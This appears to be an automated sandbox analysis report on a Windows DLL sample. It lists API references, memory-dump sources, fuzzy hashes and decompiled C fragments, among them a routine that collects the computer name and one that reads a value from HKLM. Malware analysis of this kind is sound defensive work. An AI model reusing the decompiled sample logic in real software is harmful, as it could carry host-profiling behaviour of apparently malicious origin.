                                                                                                                                                                                                                                0x736d713e
                                                                                                                                                                                                                                0x736d7143
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d7145
                                                                                                                                                                                                                                0x736d714b
                                                                                                                                                                                                                                0x736d714c
                                                                                                                                                                                                                                0x736d7151
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7157
                                                                                                                                                                                                                                0x736d7137
                                                                                                                                                                                                                                0x736d715c
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d7165
                                                                                                                                                                                                                                0x736d716f
                                                                                                                                                                                                                                0x736d7171
                                                                                                                                                                                                                                0x736d7174
                                                                                                                                                                                                                                0x736d7176
                                                                                                                                                                                                                                0x736d7182
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d71aa
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7160
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7163
                                                                                                                                                                                                                                0x736d715e
                                                                                                                                                                                                                                0x736d70e9
                                                                                                                                                                                                                                0x736d71ad
                                                                                                                                                                                                                                0x736d71b4
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70ce
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d6
                                                                                                                                                                                                                                0x736d70d4
                                                                                                                                                                                                                                0x736d71b9
                                                                                                                                                                                                                                0x736d71c5
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d7048
                                                                                                                                                                                                                                0x736d704d
                                                                                                                                                                                                                                0x736d7052
                                                                                                                                                                                                                                0x736d7057
                                                                                                                                                                                                                                0x736d705e
                                                                                                                                                                                                                                0x736d7062
                                                                                                                                                                                                                                0x736d706c
                                                                                                                                                                                                                                0x736d7078
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707a
                                                                                                                                                                                                                                0x736d707c
                                                                                                                                                                                                                                0x736d707f
                                                                                                                                                                                                                                0x736d7086
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d708b
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d7020
                                                                                                                                                                                                                                0x736d708d
                                                                                                                                                                                                                                0x736d7090
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d709c
                                                                                                                                                                                                                                0x736d6f3e
                                                                                                                                                                                                                                0x736d6f3e
                                                                                                                                                                                                                                0x736d6f4f
                                                                                                                                                                                                                                0x736d6f56
                                                                                                                                                                                                                                0x736d6f5b
                                                                                                                                                                                                                                0x736d6f6a
                                                                                                                                                                                                                                0x736d6f70
                                                                                                                                                                                                                                0x736d6f73
                                                                                                                                                                                                                                0x736d6f88
                                                                                                                                                                                                                                0x736d6f8f
                                                                                                                                                                                                                                0x736d6f99
                                                                                                                                                                                                                                0x736d6f9b
                                                                                                                                                                                                                                0x736d6f9b
                                                                                                                                                                                                                                0x736d6f73
                                                                                                                                                                                                                                0x736d6f9e
                                                                                                                                                                                                                                0x736d6fa5
                                                                                                                                                                                                                                0x736d6fac
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d6fae

APIs
• __RTC_Initialize.LIBCMT ref: 736D6F51
  • Part of subcall function 736D73CE: InitializeSListHead.KERNEL32(736EF448,736D6F5B,736E99E8,00000010,736D6EEC,?,?,?,736D7114,?,00000001,?,?,00000001,?,736E9A30), ref: 736D73D3
• ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 736D6FBB
Memory Dump Source
• Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
• Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
• Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
• Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
• Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
Similarity
• API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
• String ID:
• API String ID: 3231365870-0
• Opcode ID: 92dc1fbbad248915742f132f2745e72c64013d6888604876192229e64edc6065
• Instruction ID: 1c5554c09717eb42efe43cba12dfe30ed7c7a9443ed4e3c542d528e0cf00d5be
• Opcode Fuzzy Hash: 92dc1fbbad248915742f132f2745e72c64013d6888604876192229e64edc6065
• Instruction Fuzzy Hash: 582135366A9B049FEF01AFB8C9043DC3BA2AF01229F540459D8866F0C2DF315048CA6B
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
E736DB824() {
    signed int _t20;
    signed int _t22;
    long _t23;
    signed char _t25;
    void* _t28;
    signed int _t31;
    void* _t33;

    /* Decompiler output: loops over handle table indices 0..2. */
    _t31 = 0;
    do {
        _t20 = _t31 & 0x0000003f;
        /* Entry address: 0x38-byte records, 64 per block, block pointers at 0x736ef800. */
        _t33 = _t20 * 0x38 + *((intOrPtr*)(0x736ef800 + (_t31 >> 6) * 4));
        if (*(_t33 + 0x18) == 0xffffffff || *(_t33 + 0x18) == 0xfffffffe) {
            *(_t33 + 0x28) = 0x81;
            _t22 = _t31;
            if (_t22 == 0) {
                _push(0xfffffff6); /* STD_INPUT_HANDLE (-10) */
            } else {
                if (_t22 == 1) {
                    _push(0xfffffff5); /* STD_OUTPUT_HANDLE (-11) */
                } else {
                    _push(0xfffffff4); /* STD_ERROR_HANDLE (-12) */
                }
            }
            _pop(_t23);
            _t28 = GetStdHandle(_t23);
            if (_t28 == 0xffffffff || _t28 == 0) {
                _t25 = 0;
            } else {
                _t25 = GetFileType(_t28); // executed
            }
            if (_t25 == 0) {
                /* No usable handle, or GetFileType returned FILE_TYPE_UNKNOWN (0). */
                *(_t33 + 0x28) = *(_t33 + 0x28) | 0x00000040;
                *(_t33 + 0x18) = 0xfffffffe;
                _t20 = *0x736efb04; // 0x94aab8
                if (_t20 != 0) {
                    _t20 = *(_t20 + _t31 * 4);
                    *(_t20 + 0x10) = 0xfffffffe;
                }
            } else {
                _t20 = _t25 & 0x000000ff;
                *(_t33 + 0x18) = _t28;
                if (_t20 != 2) {
                    if (_t20 == 3) { /* FILE_TYPE_PIPE */
                        *(_t33 + 0x28) = *(_t33 + 0x28) | 0x00000008;
                    }
                } else { /* FILE_TYPE_CHAR (2) */
                    *(_t33 + 0x28) = *(_t33 + 0x28) | 0x00000040;
                }
            }
        } else {
            /* Entry already holds a handle value. */
            *(_t33 + 0x28) = *(_t33 + 0x28) | 0x00000080;
        }
        _t31 = _t31 + 1;
    } while (_t31 != 3);
    return _t20;
}











                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 736DB870
                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 736DB882
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                                • Opcode ID: 180762a39e811bfde15570bdb5cef4fa404a1308c806c867aa75a54bb6c45fb4
                                                                                                                                                                                                                                • Instruction ID: 347af3f554d3e34fb7bc24a3a5927b8f5158808816bbbbf46e6b1c7be9728709
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 180762a39e811bfde15570bdb5cef4fa404a1308c806c867aa75a54bb6c45fb4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F11D67262475266CF315A3F8E887127AA9AB52231B38071AD0B7C75FDC630D486C651
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8779A(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t26 = __edi;
                                                                                                                                                                                                                                				if(_a4 == 0) {
                                                                                                                                                                                                                                					L2:
                                                                                                                                                                                                                                					_t27 = E00A863D1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                                                                                                                                                                                                					if(_t27 == 0) {
                                                                                                                                                                                                                                						_t24 = _a12 >> 1;
                                                                                                                                                                                                                                						if(_t24 == 0) {
                                                                                                                                                                                                                                							_t27 = 2;
                                                                                                                                                                                                                                							HeapFree( *0xa8d270, 0, _a4);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t21 = _a4;
                                                                                                                                                                                                                                							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                                                                                                                                                                                                							 *_t26 = _t21;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                					return _t27;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t22 = E00A86FA6(_a4, _a8, _a12, __edi); // executed
                                                                                                                                                                                                                                				_t27 = _t22;
                                                                                                                                                                                                                                				if(_t27 == 0) {
                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				goto L2;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A86FA6: SysFreeString.OLEAUT32(00000000), ref: 00A87009
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,00A8296F,?,004F0053,01AE9370,00000000,?), ref: 00A877FD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$HeapString
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3806048269-1536154274
                                                                                                                                                                                                                                • Opcode ID: 1f2d8b23f105c63f046017f15f05721c5c6d6f7d6b9a90e396813d86db6adbe9
                                                                                                                                                                                                                                • Instruction ID: fb6c32c933c864bb70a0451bb9154e012e07fa62dfb892ed328b65a8813edb8c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f2d8b23f105c63f046017f15f05721c5c6d6f7d6b9a90e396813d86db6adbe9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0012832500519BBDB22AF95CC05EEE7BA6EF08790F148029FE089A120D731C960DB90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A8508C(void* __ecx) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                				intOrPtr* _t23;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t23 = __imp__;
                                                                                                                                                                                                                                				_t20 = 0;
                                                                                                                                                                                                                                				_v8 = _v8 & 0;
                                                                                                                                                                                                                                				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                                                                                                                				_t10 = _v8;
                                                                                                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                                                                                                					_t20 = E00A85157(_t10 + 1);
                                                                                                                                                                                                                                					if(_t20 != 0) {
                                                                                                                                                                                                                                						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                                                                                                                						if(_t15 != 0) {
                                                                                                                                                                                                                                							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							E00A853BB(_t20);
                                                                                                                                                                                                                                							_t20 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t20;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000003,00000000,00A8A5F2,747DF710,00000000,?,?,00A8A5F2), ref: 00A850A4
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000003,00000000,00A8A5F2,00A8A5F3,?,?,00A8A5F2), ref: 00A850C1
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ComputerHeapName$AllocateFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 187446995-0
                                                                                                                                                                                                                                • Opcode ID: 25bb36bce304b7275b26bd46655b8497e7cc065aaf59b0787e533e275991782d
                                                                                                                                                                                                                                • Instruction ID: 46d2cf082aa8f721f1f2e4f431ccfe63a1699b36b16bf5b4ced38b4a4382caa9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25bb36bce304b7275b26bd46655b8497e7cc065aaf59b0787e533e275991782d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9F03036A00509BFEB11E6AA8D05EAF6ABCDFC5750F210159B904D7140EA70DE069BB1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t14 = 1;
                                                                                                                                                                                                                                				_t4 = _a8;
                                                                                                                                                                                                                                				if(_t4 == 0) {
                                                                                                                                                                                                                                					if(InterlockedDecrement(0xa8d274) == 0) {
                                                                                                                                                                                                                                						E00A81F47();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					if(_t4 == 1 && InterlockedIncrement(0xa8d274) == 1) {
                                                                                                                                                                                                                                						_t10 = E00A84D07(_t11, _t12, _a4); // executed
                                                                                                                                                                                                                                						if(_t10 != 0) {
                                                                                                                                                                                                                                							_t14 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t14;
                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(00A8D274), ref: 00A8597F
                                                                                                                                                                                                                                  • Part of subcall function 00A84D07: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00A85992,?), ref: 00A84D1A
                                                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(00A8D274), ref: 00A8599F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3834848776-0
                                                                                                                                                                                                                                • Opcode ID: 832dc02cc50fee87041a3a9825c8ff99c13c36a0ccaacd4822fce9e75a9b4f64
                                                                                                                                                                                                                                • Instruction ID: 4fcc873de4f7d0d9b724fa19b897f2acfd2a74f4df5a476635f4b2c8897358eb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 832dc02cc50fee87041a3a9825c8ff99c13c36a0ccaacd4822fce9e75a9b4f64
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EE04F31A44526EBC72277B8DD04B5EB651AB11BB0F124514FC81D1090D620CC42C7B3
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 34%
                                                                                                                                                                                                                                			E00A86FA6(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				void* _v18;
                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                				intOrPtr _t19;
                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosw");
                                                                                                                                                                                                                                				_t15 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                				_t4 = _t15 + 0xa8e39c; // 0x1ae8944
                                                                                                                                                                                                                                				_t20 = _t4;
                                                                                                                                                                                                                                				_t6 = _t15 + 0xa8e124; // 0x650047
                                                                                                                                                                                                                                				_t17 = E00A86B85(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                                                                                                                				if(_t17 < 0) {
                                                                                                                                                                                                                                					_t23 = _t17;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t23 = 8;
                                                                                                                                                                                                                                					if(_v20 != _t23) {
                                                                                                                                                                                                                                						_t23 = 1;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t19 = E00A8A3CC(_t20, _v12);
                                                                                                                                                                                                                                						if(_t19 != 0) {
                                                                                                                                                                                                                                							 *_a16 = _t19;
                                                                                                                                                                                                                                							_t23 = 0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__imp__#6(_v12);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t23;
                                                                                                                                                                                                                                			}











                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A86B85: SysFreeString.OLEAUT32(?), ref: 00A86C64
                                                                                                                                                                                                                                  • Part of subcall function 00A8A3CC: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A81CB7,004F0053,00000000,?), ref: 00A8A3D5
                                                                                                                                                                                                                                  • Part of subcall function 00A8A3CC: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A81CB7,004F0053,00000000,?), ref: 00A8A3FF
                                                                                                                                                                                                                                  • Part of subcall function 00A8A3CC: memset.NTDLL ref: 00A8A413
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A87009
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 397948122-0
                                                                                                                                                                                                                                • Opcode ID: 39d716dc9c71c4c95f800f89bf83df047f6d6d691efd0518c4ebb49f7161af10
                                                                                                                                                                                                                                • Instruction ID: eb58f6bf8195a600751cde97b7e51257290d7b858ff039fb356955edcfa45614
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39d716dc9c71c4c95f800f89bf83df047f6d6d691efd0518c4ebb49f7161af10
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A019E32500019BFDB12EFA8CD04DAEBBB8EB08360B100425F941E7061E770D91197A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA84() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c2c4, 0xa8d0f0); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 69238618f1e1b2bbda8d20cc19fa0ce533be9f956d8cb9095b8dc79a1829b14a
                                                                                                                                                                                                                                • Instruction ID: 37fcfc200f5cfe2bfb6a42dd05991d71ba93c3c9cddeb2abb3f8811b04dd2d68
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69238618f1e1b2bbda8d20cc19fa0ce533be9f956d8cb9095b8dc79a1829b14a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7EB012A225C0017D3108F2445E16F37022CE0D0B20330841BF001C11C0E4402C050333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA2D() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c2c4, 0xa8d110); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: d113e4523dad9eeab9310854d10e796b597997a3e005658709de764b3b3fb572
                                                                                                                                                                                                                                • Instruction ID: a69212896d672f4936b1faf5d8c017f65e71a3e330259e05db3b32a1fd4b1c50
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d113e4523dad9eeab9310854d10e796b597997a3e005658709de764b3b3fb572
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39B012A265C0017D3118B2405E0BC37021CE4E0F60730891FF040C00C0E4402C040333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA66() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c2c4, 0xa8d0fc); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA7A() {
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				E00A8ABE6(0xa8c2c4, 0xa8d0f4); // executed
                                                                                                                                                                                                                                				goto __eax;
                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
